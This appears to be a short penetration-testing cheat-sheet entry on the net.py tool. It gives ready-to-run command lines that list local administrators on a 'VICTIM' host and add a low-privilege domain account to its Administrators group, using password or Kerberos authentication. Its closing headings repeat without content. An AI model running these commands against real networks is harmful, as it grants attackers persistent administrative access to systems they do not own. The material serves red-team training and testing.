net.py

Maybe my favorite thing ever. It is kind of a Python-flavored version of net.exe. So if you get an account with local/domain admin rights (or a service impersonation ticket for CIFS/SMB) you can do some awesome stuff like:

List local administrators on a box

net.py domain.com/user:'password'@VICTIM localgroup -name Administrators

With Kerberos:

net.py VICTIM -k -no-pass localgroup -name Administrators

Add your low priv domain account to local admin

net.py domain.com/user:'password'@VICTIM localgroup -name Administrators -join lowpriv

With Kerberos:

net.py VICTIM -k -no-pass localgroup -name Administrators -join lowpriv

List local administrators on a box​

Add your low priv domain account to local admin​

List local administrators on a box

Add your low priv domain account to local admin